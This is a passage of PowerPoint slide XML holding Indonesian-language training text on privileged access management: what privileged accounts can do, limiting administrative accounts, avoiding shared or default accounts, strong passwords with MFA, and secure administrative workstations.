              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan basis data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PAM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendokumentasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun-akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebaiknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>batasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebanyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> lain, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> default, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akuntabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (MFA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Stasiun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (SAW) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seminimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
